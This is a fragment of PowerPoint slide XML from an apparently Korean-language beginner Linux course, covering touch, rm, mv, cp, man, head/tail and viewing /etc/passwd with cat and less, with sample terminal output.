                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>drwxrwxrwx</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>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tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>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CDDDC852-3F93-4089-99C8-56E15F68227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FF64176-9B3A-4FF0-8521-F4AD2EDF4C68}"/>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0A2A001-FAE1-44DD-B931-9EB6943FEF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7E4F8C-2356-4621-9275-C533F952FDE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068EE5C4-EDB5-474F-AA2C-A1ED476C0C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93065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touch : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>파일생성 및 날짜정보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a:t>/test1/test2</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touch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touch -t </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>202106141200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oldfile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touch -</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>r oldfile newfile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sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="화살표: 오른쪽 13">
            <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE64E494-9CFA-4405-A3E5-25472588097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44B99548-0E3A-4EA5-955F-4D643F4A04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3501821-3119-4A4D-B0C1-7E1B56C3CE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E2B7609-EE34-4BB9-ABA9-0E1EAE807B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F02E5582-C089-451F-B02D-7B750A6FB59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45627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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>파일생성 및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3"/>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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>&gt; file1</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-al </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>&gt; file2</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 file2</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22 15:25 .</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>drwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>xr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>-x 3 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t> 4096  2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>22 15:00 ..</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n file1</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E75B6"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>     1  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>합계 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>8</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>     2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     3  -</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     4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a:t>     5  </a:t>
              </a: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a:t>     6  </a:t>
              </a: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&gt; file3</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E75B6"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>test file...                                       </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>: ctrl d </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>로 저장한다</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cat file3</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E75B6"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>test file...</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13EA3627-6574-4E1A-A2B9-638396A1A39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000779DE-CA65-44C7-9B27-792F4DE677C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624CFEC-0A06-4740-ABAB-3A7400EB95F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1EF2D9B-1088-4D0D-BDB5-C7DE59123A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1A581A1-F60E-4603-887F-4489D14C76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384340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rm : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>파일이나 디렉토리를 삭제</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file2  file3  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rm file*</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>rm</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>: remove </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>일반 파일 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>`file2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>'?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파일 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>`file3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>'?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 test3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>rm</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>: remove </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>디렉토리 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>`test3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>/’? </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Y</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rf test4</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>/       </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>: force, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>강제로 삭제한다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04507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p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>rm</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>: remove </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>일반 빈 파일 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>`newfile'?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빈 파일 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>`oldfile'?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8171CE12-5414-4308-AE17-F897C3D9AA3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76798609-8474-4D57-BE48-1EF1C3A97B3A}"/>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CAA2952-DC50-46D8-A79F-AFD60C37AF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20E5CA0-B367-4C91-9398-376C483B670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5D3C576-B512-4FCD-844D-DF2391D10A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39277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mv</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File1</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file1  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84674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cd dir1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3E95ABA1-5A5D-4C6C-9D74-E9B9C389F41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6DF4EA2-99DA-4838-BC7F-2A13C8E5A3A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29709D26-D5EA-442A-82C4-9C86514A3D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77C0C26-9A64-492E-A760-F0D0476B6B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B4FED0B-287B-47B0-A085-FBB97D135A6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422156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/T2/9</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디렉토리를 복사</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solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>dir1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>  </a:t>
              </a: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 dir1/</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>file1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AD4E8980-CE65-4FD1-8D26-5130C9071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E8E1E807-FC01-4F38-BA3F-8097295366D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E322AD75-2D1A-4ED7-BAF9-40C82A814E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17F6CA6-54CD-4737-B4E2-B0A0983E1B5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25B282B7-B81E-4B6E-A1DD-306C0F9260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069149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man : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>리눅스 매뉴얼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man cp</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r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>:</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>q</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cp </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>--help</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E75B6"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>Usage: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>cp [OPTION]... [-T] SOURCE DEST</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>  or:  cp [OPTION]... SOURCE... DIRECTORY</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>  or:  cp [OPTION]... -t DIRECTORY SOURCE...</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>Copy SOURCE to DEST, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>or multiple </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>SOURCE(s) to DIRECTORY.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>긴 옵션에서 꼭 필요한 인수는 짧은 옵션에도 꼭 필요합니다</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>  -a, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>--archive                same </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>as -</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>dR</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>--preserve=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>all</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>      --backup[=CONTROL</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>]       make </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>a backup </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>of each existing destination file</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>  -</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>b                           like </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>--backup </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>but does not accept an argument</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="그림 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8DA82AC-5EBF-46EE-B886-DFBC980828E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="924959" y="2099144"/>
            <a:ext cx="4960705" cy="2531131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="화살표: 오른쪽 13">
            <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{251D2A05-6BF4-40B2-B0E7-118B53AA823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6E45566F-7D80-4B04-AD9E-32699BB9617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701ED16-434C-45BD-A769-0BBFA69942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8E66985-722D-43AA-94EA-84F7E51A2E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4" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52AFB842-7DD1-4076-9A64-2BF1E761F1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810439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/T2/11</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>head</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>/tail</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보고싶은 줄 수만큼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>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cat /etc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daemon</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>:x:2:2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>:daemon</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>:/</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r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>…</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="nb-NO" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>[root@localhost log</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="nb-NO" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>]# less /etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="nb-NO" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>/passwd</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>rpcuser</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>:x:29:29:</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>RPC Service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nfsnobody:x:65534:65534:Anonymous </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>NFS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mailnull:x:47:47::/var/spool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smmsp:x:51:51::/var/spool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distcache:</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>x:94:94</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>:Distcache:/:/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highlight>
                    <a:srgbClr val="A6A6A6"/>
                  </a:highlight>
                </a:rPr>
                <a:t>/etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:highlight>
                    <a:srgbClr val="A6A6A6"/>
                  </a:highlight>
                </a:rPr>
                <a:t>/passwd</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:highlight>
                  <a:srgbClr val="A6A6A6"/>
                </a:highlight>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>:  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>위에서 아래</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>아래에서 위로 둘 다 이동이 가능</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>화살표키</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>, Page </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>Up</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>, Page </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>Down </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>키가 작동함</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>파일을 다 읽고 나가기 위해서는 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>q</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>키를 눌러야 함</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a: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243400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="nb-NO" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>[root@localhost log</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="nb-NO" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
